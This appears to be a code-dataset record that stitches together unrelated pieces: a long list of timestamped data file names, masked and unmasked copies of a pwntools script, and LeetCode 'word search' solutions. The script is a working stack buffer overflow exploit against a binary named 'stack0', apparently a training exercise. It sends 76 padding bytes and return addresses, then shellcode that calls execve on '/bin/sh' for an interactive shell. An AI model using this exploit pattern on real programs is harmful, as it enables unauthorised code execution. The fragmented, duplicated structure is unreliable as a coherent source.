2014.txt',\n'data3Tue_Dec_30_22_55_13_2014.txt',\n'data3Tue_Dec_30_22_55_28_2014.txt',\n'data3Tue_Dec_30_22_55_43_2014.txt',\n'data3Tue_Dec_30_22_55_58_2014.txt',\n'data3Tue_Dec_30_22_56_13_2014.txt',\n'data3Tue_Dec_30_22_56_28_2014.txt',\n'data3Tue_Dec_30_22_56_43_2014.txt',\n'data3Tue_Dec_30_22_56_57_2014.txt',\n'data3Tue_Dec_30_22_57_12_2014.txt',\n'data3Tue_Dec_30_22_57_27_2014.txt',\n'data3Tue_Dec_30_22_57_42_2014.txt',\n'data3Tue_Dec_30_22_57_56_2014.txt',\n'data3Tue_Dec_30_22_58_12_2014.txt',\n'data3Tue_Dec_30_22_58_26_2014.txt',\n'data3Tue_Dec_30_22_58_41_2014.txt',\n'data3Tue_Dec_30_22_58_56_2014.txt',\n'data3Tue_Dec_30_22_59_10_2014.txt',\n'data3Tue_Dec_30_22_59_25_2014.txt',\n'data3Tue_Dec_30_22_59_40_2014.txt',\n'data3Tue_Dec_30_22_59_54_2014.txt',\n'data3Tue_Dec_30_23_00_10_2014.txt',\n'data3Tue_Dec_30_23_00_25_2014.txt',\n'data3Tue_Dec_30_23_00_39_2014.txt',\n'data3Tue_Dec_30_23_00_54_2014.txt',\n'data3Tue_Dec_30_23_01_09_2014.txt',\n'data3Tue_Dec_30_23_01_23_2014.txt',\n'data3Tue_Dec_30_23_01_38_2014.txt',\n'data3Tue_Dec_30_23_01_53_2014.txt',\n'data3Tue_Dec_30_23_02_07_2014.txt',\n'data3Tue_Dec_30_23_02_22_2014.txt',\n'data3Tue_Dec_30_23_02_37_2014.txt',\n'data3Tue_Dec_30_23_02_52_2014.txt',\n'data3Tue_Dec_30_23_03_06_2014.txt',\n'data3Tue_Dec_30_23_03_21_2014.txt',\n'data3Tue_Dec_30_23_03_36_2014.txt',\n'data3Tue_Dec_30_23_03_51_2014.txt',\n'data3Tue_Dec_30_23_04_05_2014.txt',\n'data3Tue_Dec_30_23_04_20_2014.txt',\n'data3Tue_Dec_30_23_04_34_2014.txt',\n'data3Tue_Dec_30_23_04_49_2014.txt',\n'data3Tue_Dec_30_23_05_04_2014.txt',\n'data3Tue_Dec_30_23_05_19_2014.txt',\n'data3Tue_Dec_30_23_05_34_2014.txt',\n'data3Tue_Dec_30_23_05_49_2014.txt',\n'data3Tue_Dec_30_23_06_04_2014.txt',\n'data3Tue_Dec_30_23_06_18_2014.txt',\n'data3Tue_Dec_30_23_06_33_2014.txt',\n'data3Tue_Dec_30_23_06_48_2014.txt',\n'data0Tue_Dec_30_23_07_28_2014.txt',\n'data0Tue_Dec_30_23_07_42_2014.txt',\n'data0Tue_Dec_30_23_07_58_2014.txt',\n'data0Tue_Dec_30_23_08_12_2014.txt',\n'data0Tue_Dec_30_23_08_27_2014.txt',\n'data0Tue_Dec_30_23_08_42_2014.txt',\n'data0Tue_Dec_30_23_08_57_2014.txt',\n'data0Tue_Dec_30_23_09_12_2014.txt',\n'data0Tue_Dec_30_23_09_27_2014.txt',\n'data0Tue_Dec_30_23_09_42_2014.txt',\n'data0Tue_Dec_30_23_09_57_2014.txt',\n'data0Tue_Dec_30_23_10_12_2014.txt',\n'data0Tue_Dec_30_23_10_26_2014.txt',\n'data0Tue_Dec_30_23_10_42_2014.txt',\n'data0Tue_Dec_30_23_10_57_2014.txt',\n'data0Tue_Dec_30_23_11_12_2014.txt',\n'data0Tue_Dec_30_23_11_27_2014.txt',\n'data0Tue_Dec_30_23_11_42_2014.txt',\n'data0Tue_Dec_30_23_11_56_2014.txt',\n'data0Tue_Dec_30_23_12_11_2014.txt',\n'data0Tue_Dec_30_23_12_26_2014.txt',\n'data0Tue_Dec_30_23_12_40_2014.txt',\n'data0Tue_Dec_30_23_12_55_2014.txt',\n'data0Tue_Dec_30_23_13_10_2014.txt',\n'data0Tue_Dec_30_23_13_25_2014.txt',\n'data0Tue_Dec_30_23_13_40_2014.txt',\n'data0Tue_Dec_30_23_13_55_2014.txt',\n'data0Tue_Dec_30_23_14_11_2014.txt',\n'data0Tue_Dec_30_23_14_26_2014.txt',\n'data0Tue_Dec_30_23_14_40_2014.txt',\n'data0Tue_Dec_30_23_14_55_2014.txt',\n'data0Tue_Dec_30_23_15_09_2014.txt',\n'data0Tue_Dec_30_23_15_24_2014.txt',\n'data0Tue_Dec_30_23_15_39_2014.txt',\n'data0Tue_Dec_30_23_15_54_2014.txt',\n'data0Tue_Dec_30_23_16_08_2014.txt',\n'data0Tue_Dec_30_23_16_23_2014.txt',\n'data0Tue_Dec_30_23_16_37_2014.txt',\n'data0Tue_Dec_30_23_16_52_2014.txt',\n'data0Tue_Dec_30_23_17_08_2014.txt',\n'data0Tue_Dec_30_23_17_23_2014.txt',\n'data0Tue_Dec_30_23_17_37_2014.txt',\n'data0Tue_Dec_30_23_17_52_2014.txt',\n'data0Tue_Dec_30_23_18_07_2014.txt',\n'data0Tue_Dec_30_23_18_22_2014.txt',\n'data0Tue_Dec_30_23_18_36_2014.txt',\n'data0Tue_Dec_30_23_18_51_2014.txt',\n'data0Tue_Dec_30_23_19_06_2014.txt',\n'data0Tue_Dec_30_23_19_21_2014.txt',\n'data0Tue_Dec_30_23_19_36_2014.txt',\n'data1Tue_Dec_30_23_19_50_2014.txt',\n'data1Tue_Dec_30_23_20_05_2014.txt',\n'data1Tue_Dec_30_23_20_20_2014.txt',\n'data1Tue_Dec_30_23_20_34_2014.txt',\n'data1Tue_Dec_30_23_20_49_2014.txt',\n'data1Tue_Dec_30_23_21_04_2014.txt',\n'data1Tue_Dec_30_23_21_19_2014.txt',\n'data1Tue_Dec_30_23_21_33_2014.txt',\n'data1Tue_Dec_30_23_21_48_2014.txt',\n'data1Tue_Dec_30_23_22_03_2014.txt',\n'data1Tue_Dec_30_23_22_18_2014.txt',\n'data1Tue_Dec_30_23_22_33_2014.txt',\n'data1Tue_Dec_30_23_22_48_2014.txt',\n'data1Tue_Dec_30_23_23_03_2014.txt',\n'data1Tue_Dec_30_23_23_17_2014.txt',\n'data1Tue_Dec_30_23_23_32_2014.txt',\n'data1Tue_Dec_30_23_23_47_2014.txt',\n'data1Tue_Dec_30_23_24_02_2014.txt',\n'data1Tue_Dec_30_23_24_16_2014.txt',\n'data1Tue_Dec_30_23_24_31_2014.txt',\n'data1Tue_Dec_30_23_24_45_2014.txt',\n'data1Tue_Dec_30_23_25_00_2014.txt',\n'data1Tue_Dec_30_23_25_15_2014.txt',\n'data1Tue_Dec_30_23_25_29_2014.txt',\n'data1Tue_Dec_30_23_25_44_2014.txt',\n'data1Tue_Dec_30_23_25_59_2014.txt',\n'data1Tue_Dec_30_23_26_13_2014.txt',\n'data1Tue_Dec_30_23_26_28_2014.txt',\n'data1Tue_Dec_30_23_26_43_2014.txt',\n'data1Tue_Dec_30_23_26_58_2014.txt',\n'data1Tue_Dec_30_23_27_13_2014.txt',\n'data1Tue_Dec_30_23_27_27_2014.txt',\n'data1Tue_Dec_30_23_27_42_2014.txt',\n'data1Tue_Dec_30_23_27_57_2014.txt',\n'data1Tue_Dec_30_23_28_11_2014.txt',\n'data1Tue_Dec_30_23_28_26_2014.txt',\n'data1Tue_Dec_30_23_28_42_2014.txt',\n'data1Tue_Dec_30_23_28_56_2014.txt',\n'data1Tue_Dec_30_23_29_11_2014.txt',\n'data1Tue_Dec_30_23_29_26_2014.txt',\n'data1Tue_Dec_30_23_29_41_2014.txt',\n'data1Tue_Dec_30_23_29_56_2014.txt',\n'data1Tue_Dec_30_23_30_10_2014.txt',\n'data1Tue_Dec_30_23_30_25_2014.txt',\n'data1Tue_Dec_30_23_30_40_2014.txt',\n'data1Tue_Dec_30_23_30_55_2014.txt',\n'data1Tue_Dec_30_23_31_10_2014.txt',\n'data1Tue_Dec_30_23_31_25_2014.txt',\n'data1Tue_Dec_30_23_31_39_2014.txt',\n'data1Tue_Dec_30_23_31_54_2014.txt',\n'data2Tue_Dec_30_23_32_09_2014.txt',\n'data2Tue_Dec_30_23_32_24_2014.txt',\n'data2Tue_Dec_30_23_32_39_2014.txt',\n'data2Tue_Dec_30_23_32_53_2014.txt',\n'data2Tue_Dec_30_23_33_08_2014.txt',\n'data2Tue_Dec_30_23_33_23_2014.txt',\n'data2Tue_Dec_30_23_33_38_2014.txt',\n'data2Tue_Dec_30_23_33_53_2014.txt',\n'data2Tue_Dec_30_23_34_08_2014.txt',\n'data2Tue_Dec_30_23_34_23_2014.txt',\n'data2Tue_Dec_30_23_34_37_2014.txt',\n'data2Tue_Dec_30_23_34_52_2014.txt',\n'data2Tue_Dec_30_23_35_07_2014.txt',\n'data2Tue_Dec_30_23_35_22_2014.txt',\n'data2Tue_Dec_30_23_35_37_2014.txt',\n'data2Tue_Dec_30_23_35_52_2014.txt',\n'data2Tue_Dec_30_23_36_07_2014.txt',\n'data2Tue_Dec_30_23_36_22_2014.txt',\n'data2Tue_Dec_30_23_36_36_2014.txt',\n'data2Tue_Dec_30_23_36_51_2014.txt',\n'data2Tue_Dec_30_23_37_06_2014.txt',\n'data2Tue_Dec_30_23_37_20_2014.txt',\n'data2Tue_Dec_30_23_37_35_2014.txt',\n'data2Tue_Dec_30_23_37_50_2014.txt',\n'data2Tue_Dec_30_23_38_05_2014.txt',\n'data2Tue_Dec_30_23_38_20_2014.txt',\n'data2Tue_Dec_30_23_38_35_2014.txt',\n'data2Tue_Dec_30_23_38_50_2014.txt',\n'data2Tue_Dec_30_23_39_05_2014.txt',\n'data2Tue_Dec_30_23_39_19_2014.txt',\n'data2Tue_Dec_30_23_39_34_2014.txt',\n'data2Tue_Dec_30_23_39_49_2014.txt',\n'data2Tue_Dec_30_23_40_04_2014.txt',\n'data2Tue_Dec_30_23_40_18_2014.txt',\n'data2Tue_Dec_30_23_40_33_2014.txt',\n'data2Tue_Dec_30_23_40_48_2014.txt',\n'data2Tue_Dec_30_23_41_03_2014.txt',\n'data2Tue_Dec_30_23_41_18_2014.txt',\n'data2Tue_Dec_30_23_41_33_2014.txt',\n'data2Tue_Dec_30_23_41_48_2014.txt',\n'data2Tue_Dec_30_23_42_03_2014.txt',\n'data2Tue_Dec_30_23_42_18_2014.txt',\n'data2Tue_Dec_30_23_42_33_2014.txt',\n'data2Tue_Dec_30_23_42_47_2014.txt',\n'data2Tue_Dec_30_23_43_02_2014.txt',\n'data2Tue_Dec_30_23_43_18_2014.txt',\n'data2Tue_Dec_30_23_43_33_2014.txt',\n'data2Tue_Dec_30_23_43_47_2014.txt',\n'data2Tue_Dec_30_23_44_02_2014.txt',\n'data2Tue_Dec_30_23_44_17_2014.txt',\n'data3Tue_Dec_30_23_44_32_2014.txt',\n'data3Tue_Dec_30_23_44_46_2014.txt',\n'data3Tue_Dec_30_23_45_01_2014.txt',\n'data3Tue_Dec_30_23_45_16_2014.txt',\n'data3Tue_Dec_30_23_45_31_2014.txt',\n'data3Tue_Dec_30_23_45_46_2014.txt',\n'data3Tue_Dec_30_23_46_00_2014.txt',\n'data3Tue_Dec_30_23_46_16_2014.txt',\n'data3Tue_Dec_30_23_46_31_2014.txt',\n'data3Tue_Dec_30_23_46_46_2014.txt',\n'data3Tue_Dec_30_23_47_01_2014.txt',\n'data3Tue_Dec_30_23_47_16_2014.txt',\n'data3Tue_Dec_30_23_47_31_2014.txt',\n'data3Tue_Dec_30_23_47_46_2014.txt',\n'data3Tue_Dec_30_23_48_01_2014.txt',\n'data3Tue_Dec_30_23_48_16_2014.txt',\n'data3Tue_Dec_30_23_48_31_2014.txt',\n'data3Tue_Dec_30_23_48_45_2014.txt',\n'data3Tue_Dec_30_23_49_00_2014.txt',\n'data3Tue_Dec_30_23_49_15_2014.txt',\n'data3Tue_Dec_30_23_49_30_2014.txt',\n'data3Tue_Dec_30_23_49_45_2014.txt',\n'data3Tue_Dec_30_23_49_59_2014.txt',\n'data3Tue_Dec_30_23_50_14_2014.txt',\n'data3Tue_Dec_30_23_50_29_2014.txt',\n'data3Tue_Dec_30_23_50_44_2014.txt',\n'data3Tue_Dec_30_23_50_59_2014.txt',\n'data3Tue_Dec_30_23_51_13_2014.txt',\n'data3Tue_Dec_30_23_51_28_2014.txt',\n'data3Tue_Dec_30_23_51_43_2014.txt',\n'data3Tue_Dec_30_23_51_57_2014.txt',\n'data3Tue_Dec_30_23_52_13_2014.txt',\n'data3Tue_Dec_30_23_52_28_2014.txt',\n'data3Tue_Dec_30_23_52_43_2014.txt',\n'data3Tue_Dec_30_23_52_58_2014.txt',\n'data3Tue_Dec_30_23_53_12_2014.txt',\n'data3Tue_Dec_30_23_53_27_2014.txt',\n'data3Tue_Dec_30_23_53_42_2014.txt',\n'data3Tue_Dec_30_23_53_56_2014.txt',\n'data3Tue_Dec_30_23_54_11_2014.txt',\n'data3Tue_Dec_30_23_54_26_2014.txt',\n'data3Tue_Dec_30_23_54_41_2014.txt',\n'data3Tue_Dec_30_23_54_56_2014.txt',\n'data3Tue_Dec_30_23_55_11_2014.txt',\n'data3Tue_Dec_30_23_55_26_2014.txt',\n'data3Tue_Dec_30_23_55_41_2014.txt',\n'data3Tue_Dec_30_23_55_55_2014.txt',\n'data3Tue_Dec_30_23_56_10_2014.txt',\n'data3Tue_Dec_30_23_56_25_2014.txt',\n'data3Tue_Dec_30_23_56_40_2014.txt',\n'data0Tue_Dec_30_23_57_21_2014.txt',\n'data0Tue_Dec_30_23_57_36_2014.txt',\n'data0Tue_Dec_30_23_57_51_2014.txt',\n'data0Tue_Dec_30_23_58_06_2014.txt',\n'data0Tue_Dec_30_23_58_20_2014.txt',\n'data0Tue_Dec_30_23_58_35_2014.txt',\n'data0Tue_Dec_30_23_58_50_2014.txt',\n'data0Tue_Dec_30_23_59_05_2014.txt',\n'data0Tue_Dec_30_23_59_20_2014.txt',\n'data0Tue_Dec_30_23_59_35_2014.txt',\n'data0Tue_Dec_30_23_59_49_2014.txt',\n'data0Wed_Dec_31_00_00_04_2014.txt',\n'data0Wed_Dec_31_00_00_18_2014.txt',\n'data0Wed_Dec_31_00_00_33_2014.txt',\n'data0Wed_Dec_31_00_00_48_2014.txt',\n'data0Wed_Dec_31_00_01_02_2014.txt',\n'data0Wed_Dec_31_00_01_17_2014.txt',\n'data0Wed_Dec_31_00_01_32_2014.txt',\n'data0Wed_Dec_31_00_01_48_2014.txt',\n'data0Wed_Dec_31_00_02_02_2014.txt',\n'data0Wed_Dec_31_00_02_18_2014.txt',\n'data0Wed_Dec_31_00_02_32_2014.txt',\n'data0Wed_Dec_31_00_02_47_2014.txt',\n'data0Wed_Dec_31_00_03_01_2014.txt',\n'data0Wed_Dec_31_00_03_17_2014.txt',\n'data0Wed_Dec_31_00_03_32_2014.txt',\n'data0Wed_Dec_31_00_03_46_2014.txt',\n'data0Wed_Dec_31_00_04_01_2014.txt',\n'data0Wed_Dec_31_00_04_16_2014.txt',\n'data0Wed_Dec_31_00_04_31_2014.txt',\n'data0Wed_Dec_31_00_04_46_2014.txt',\n'data0Wed_Dec_31_00_05_00_2014.txt',\n'data0Wed_Dec_31_00_05_15_2014.txt',\n'data0Wed_Dec_31_00_05_31_2014.txt',\n'data0Wed_Dec_31_00_05_46_2014.txt',\n'data0Wed_Dec_31_00_06_01_2014.txt',\n'data0Wed_Dec_31_00_06_15_2014.txt',\n'data0Wed_Dec_31_00_06_30_2014.txt',\n'data0Wed_Dec_31_00_06_45_2014.txt',\n'data0Wed_Dec_31_00_07_00_2014.txt',\n'data0Wed_Dec_31_00_07_14_2014.txt',\n'data0Wed_Dec_31_00_07_29_2014.txt',\n'data0Wed_Dec_31_00_07_44_2014.txt',\n'data0Wed_Dec_31_00_07_59_2014.txt',\n'data0Wed_Dec_31_00_08_13_2014.txt',\n'data0Wed_Dec_31_00_08_28_2014.txt',\n'data0Wed_Dec_31_00_08_43_2014.txt',\n'data0Wed_Dec_31_00_08_57_2014.txt',\n'data0Wed_Dec_31_00_09_12_2014.txt',\n'data0Wed_Dec_31_00_09_27_2014.txt',\n'data1Wed_Dec_31_00_09_42_2014.txt',\n'data1Wed_Dec_31_00_09_57_2014.txt',\n'data1Wed_Dec_31_00_10_11_2014.txt',\n'data1Wed_Dec_31_00_10_26_2014.txt',\n'data1Wed_Dec_31_00_10_41_2014.txt',\n'data1Wed_Dec_31_00_10_56_2014.txt',\n'data1Wed_Dec_31_00_11_11_2014.txt',\n'data1Wed_Dec_31_00_11_26_2014.txt',\n'data1Wed_Dec_31_00_11_40_2014.txt',\n'data1Wed_Dec_31_00_11_55_2014.txt',\n'data1Wed_Dec_31_00_12_10_2014.txt',\n'data1Wed_Dec_31_00_12_25_2014.txt',\n'data1Wed_Dec_31_00_12_40_2014.txt',\n'data1Wed_Dec_31_00_12_54_2014.txt',\n'data1Wed_Dec_31_00_13_09_2014.txt',\n'data1Wed_Dec_31_00_13_24_2014.txt',\n'data1Wed_Dec_31_00_13_39_2014.txt',\n'data1Wed_Dec_31_00_13_54_2014.txt',\n'data1Wed_Dec_31_00_14_09_2014.txt',\n'data1Wed_Dec_31_00_14_24_2014.txt',\n'data1Wed_Dec_31_00_14_38_2014.txt',\n'data1Wed_Dec_31_00_14_53_2014.txt',\n'data1Wed_Dec_31_00_15_07_2014.txt',\n'data1Wed_Dec_31_00_15_22_2014.txt',\n'data1Wed_Dec_31_00_15_37_2014.txt',\n'data1Wed_Dec_31_00_15_52_2014.txt',\n'data1Wed_Dec_31_00_16_06_2014.txt',\n'data1Wed_Dec_31_00_16_22_2014.txt',\n'data1Wed_Dec_31_00_16_38_2014.txt',\n'data1Wed_Dec_31_00_16_52_2014.txt',\n'data1Wed_Dec_31_00_17_07_2014.txt',\n'data1Wed_Dec_31_00_17_22_2014.txt',\n'data1Wed_Dec_31_00_17_37_2014.txt',\n'data1Wed_Dec_31_00_17_51_2014.txt',\n'data1Wed_Dec_31_00_18_06_2014.txt',\n'data1Wed_Dec_31_00_18_20_2014.txt',\n'data1Wed_Dec_31_00_18_35_2014.txt',\n'data1Wed_Dec_31_00_18_50_2014.txt',\n'data1Wed_Dec_31_00_19_04_2014.txt',\n'data1Wed_Dec_31_00_19_19_2014.txt',\n'data1Wed_Dec_31_00_19_34_2014.txt',\n'data1Wed_Dec_31_00_19_48_2014.txt',\n'data1Wed_Dec_31_00_20_03_2014.txt',\n'data1Wed_Dec_31_00_20_18_2014.txt',\n'data1Wed_Dec_31_00_20_33_2014.txt',\n'data1Wed_Dec_31_00_20_48_2014.txt',\n'data1Wed_Dec_31_00_21_03_2014.txt',\n'data1Wed_Dec_31_00_21_18_2014.txt',\n'data1Wed_Dec_31_00_21_32_2014.txt',\n'data1Wed_Dec_31_00_21_47_2014.txt',\n'data2Wed_Dec_31_00_22_02_2014.txt',\n'data2Wed_Dec_31_00_22_17_2014.txt',\n'data2Wed_Dec_31_00_22_32_2014.txt',\n'data2Wed_Dec_31_00_22_47_2014.txt',\n'data2Wed_Dec_31_00_23_01_2014.txt',\n'data2Wed_Dec_31_00_23_16_2014.txt',\n'data2Wed_Dec_31_00_23_31_2014.txt',\n'data2Wed_Dec_31_00_23_46_2014.txt',\n'data2Wed_Dec_31_00_24_01_2014.txt',\n'data2Wed_Dec_31_00_24_16_2014.txt',\n'data2Wed_Dec_31_00_24_30_2014.txt',\n'data2Wed_Dec_31_00_24_45_2014.txt',\n'data2Wed_Dec_31_00_25_00_2014.txt',\n'data2Wed_Dec_31_00_25_15_2014.txt',\n'data2Wed_Dec_31_00_25_29_2014.txt',\n'data2Wed_Dec_31_00_25_44_2014.txt',\n'data2Wed_Dec_31_00_25_59_2014.txt',\n'data2Wed_Dec_31_00_26_14_2014.txt',\n'data2Wed_Dec_31_00_26_29_2014.txt',\n'data2Wed_Dec_31_00_26_43_2014.txt',\n'data2Wed_Dec_31_00_26_59_2014.txt',\n'data2Wed_Dec_31_00_27_13_2014.txt',\n'data2Wed_Dec_31_00_27_28_2014.txt',\n'data2Wed_Dec_31_00_27_43_2014.txt',\n'data2Wed_Dec_31_00_27_58_2014.txt',\n'data2Wed_Dec_31_00_28_13_2014.txt',\n'data2Wed_Dec_31_00_28_28_2014.txt',\n'data2Wed_Dec_31_00_28_43_2014.txt',\n'data2Wed_Dec_31_00_28_57_2014.txt',\n'data2Wed_Dec_31_00_29_12_2014.txt',\n'data2Wed_Dec_31_00_29_27_2014.txt',\n'data2Wed_Dec_31_00_29_42_2014.txt',\n'data2Wed_Dec_31_00_29_57_2014.txt',\n'data2Wed_Dec_31_00_30_12_2014.txt',\n'data2Wed_Dec_31_00_30_27_2014.txt',\n'data2Wed_Dec_31_00_30_42_2014.txt',\n'data2Wed_Dec_31_00_30_57_2014.txt',\n'data2Wed_Dec_31_00_31_12_2014.txt',\n'data2Wed_Dec_31_00_31_27_2014.txt',\n'data2Wed_Dec_31_00_31_41_2014.txt',\n'data2Wed_Dec_31_00_31_56_2014.txt',\n'data2Wed_Dec_31_00_32_11_2014.txt',\n'data2Wed_Dec_31_00_32_26_2014.txt',\n'data2Wed_Dec_31_00_32_40_2014.txt',\n'data2Wed_Dec_31_00_32_55_2014.txt',\n'data2Wed_Dec_31_00_33_10_2014.txt',\n'data2Wed_Dec_31_00_33_24_2014.txt',\n'data2Wed_Dec_31_00_33_39_2014.txt',\n'data2Wed_Dec_31_00_33_54_2014.txt',\n'data2Wed_Dec_31_00_34_09_2014.txt',\n'data3Wed_Dec_31_00_34_24_2014.txt',\n'data3Wed_Dec_31_00_34_39_2014.txt',\n'data3Wed_Dec_31_00_34_54_2014.txt',\n'data3Wed_Dec_31_00_35_09_2014.txt',\n'data3Wed_Dec_31_00_35_24_2014.txt',\n'data3Wed_Dec_31_00_35_39_2014.txt',\n'data3Wed_Dec_31_00_35_54_2014.txt',\n'data3Wed_Dec_31_00_36_08_2014.txt',\n'data3Wed_Dec_31_00_36_23_2014.txt',\n'data3Wed_Dec_31_00_36_38_2014.txt',\n'data3Wed_Dec_31_00_36_53_2014.txt',\n'data3Wed_Dec_31_00_37_08_2014.txt',\n'data3Wed_Dec_31_00_37_22_2014.txt',\n'data3Wed_Dec_31_00_37_38_2014.txt',\n'data3Wed_Dec_31_00_37_53_2014.txt',\n'data3Wed_Dec_31_00_38_08_2014.txt',\n'data3Wed_Dec_31_00_38_22_2014.txt',\n'data3Wed_Dec_31_00_38_37_2014.txt',\n'data3Wed_Dec_31_00_38_52_2014.txt',\n'data3Wed_Dec_31_00_39_07_2014.txt',\n'data3Wed_Dec_31_00_39_22_2014.txt',\n'data3Wed_Dec_31_00_39_36_2014.txt',\n'data3Wed_Dec_31_00_39_51_2014.txt',\n'data3Wed_Dec_31_00_40_06_2014.txt',\n'data3Wed_Dec_31_00_40_21_2014.txt',\n'data3Wed_Dec_31_00_40_36_2014.txt',\n'data3Wed_Dec_31_00_40_50_2014.txt',\n'data3Wed_Dec_31_00_41_05_2014.txt',\n'data3Wed_Dec_31_00_41_20_2014.txt',\n'data3Wed_Dec_31_00_41_34_2014.txt',\n'data3Wed_Dec_31_00_41_50_2014.txt',\n'data3Wed_Dec_31_00_42_04_2014.txt',\n'data3Wed_Dec_31_00_42_19_2014.txt',\n'data3Wed_Dec_31_00_42_33_2014.txt',\n'data3Wed_Dec_31_00_42_48_2014.txt',\n'data3Wed_Dec_31_00_43_03_2014.txt',\n'data3Wed_Dec_31_00_43_18_2014.txt',\n'data3Wed_Dec_31_00_43_33_2014.txt',\n'data3Wed_Dec_31_00_43_48_2014.txt',\n'data3Wed_Dec_31_00_44_03_2014.txt',\n'data3Wed_Dec_31_00_44_18_2014.txt',\n'data3Wed_Dec_31_00_44_33_2014.txt',\n'data3Wed_Dec_31_00_44_48_2014.txt',\n'data3Wed_Dec_31_00_45_03_2014.txt',\n'data3Wed_Dec_31_00_45_18_2014.txt',\n'data3Wed_Dec_31_00_45_33_2014.txt',\n'data3Wed_Dec_31_00_45_48_2014.txt',\n'data3Wed_Dec_31_00_46_03_2014.txt',\n'data3Wed_Dec_31_00_46_18_2014.txt',\n'data3Wed_Dec_31_00_46_32_2014.txt']\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
r.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))
r.sendline(shellcode)
r.interactive()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
shellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'
) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'
) + '/bin/sh'
r = process('./stack0', aslr=True)
r.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))
r.sendline(shellcode)
r.interactive()
<|reserved_special_token_1|>
from pwn import *
shellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'
) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'
) + '/bin/sh'
r = process('./stack0', aslr=True)
r.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))
r.sendline(shellcode)
r.interactive()
<|reserved_special_token_1|>
#inject shellcode
from pwn import *
shellcode =p32(0x8049000+0x4)\
+asm("mov eax,SYS_execve")\
+asm("xor ecx,ecx")\
+asm("xor edx,edx")\
+asm("mov ebx,0x8049014")\
+asm("int 0x80")\
+"/bin/sh"
r=process("./stack0",aslr=True)
r.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))
r.sendline(shellcode)
r.interactive()
|
flexible
|
{
"blob_id": "cf70d6064fd4a43bc17cd852aaf04afade73d995",
"index": 9252,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-3": "<mask token>\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-4": "from pwn import *\nshellcode = p32(134516736 + 4) + asm('mov eax,SYS_execve') + asm('xor ecx,ecx'\n ) + asm('xor edx,edx') + asm('mov ebx,0x8049014') + asm('int 0x80'\n ) + '/bin/sh'\nr = process('./stack0', aslr=True)\nr.sendline('A' * 76 + p32(134516736 - 4) + p32(134513676) + p32(134516736))\nr.sendline(shellcode)\nr.interactive()\n",
"step-5": "#inject shellcode\nfrom pwn import *\n\n\nshellcode =p32(0x8049000+0x4)\\\n+asm(\"mov eax,SYS_execve\")\\\n+asm(\"xor ecx,ecx\")\\\n+asm(\"xor edx,edx\")\\\n+asm(\"mov ebx,0x8049014\")\\\n+asm(\"int 0x80\")\\\n+\"/bin/sh\"\nr=process(\"./stack0\",aslr=True)\nr.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))\nr.sendline(shellcode)\nr.interactive()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
if board[ni][nj] == word[0]:
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
if board[i][j] == word[0]:
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
if board[ni][nj] == word[0]:
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
m, n = len(board), len(board[0])
for i in range(m):
for j in range(n):
if board[i][j] == word[0]:
if dfs(i, j, word[1:], set([(i, j)])):
return True
return False
<|reserved_special_token_1|>
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
if not board or not board[0]:
return not word
self.length = len(word)
def hasPathCore(row, col, depth=0):
if self.length == depth:
return True
hasPath = False
if 0 <= row and row < len(board) and 0 <= col and col < len(board
[0]) and board[row][col] == word[depth] and not visited[row][
col]:
visited[row][col] = True
up = hasPathCore(row - 1, col, depth + 1)
down = hasPathCore(row + 1, col, depth + 1)
left = hasPathCore(row, col - 1, depth + 1)
right = hasPathCore(row, col + 1, depth + 1)
hasPath = up or down or left or right
if not hasPath:
visited[row][col] = False
return hasPath
visited = [([False] * len(board[0])) for _ in range(len(board))]
for i in range(len(board)):
for j in range(len(board[0])):
if hasPathCore(i, j, 0):
return True
return False
class Solution(object):
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
def dfs(i, j, word, visited=set()):
if not word:
return True
for ni, nj in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
if board[ni][nj] == word[0]:
if dfs(ni, nj, word[1:], visited | {(ni, nj)}):
return True
return False
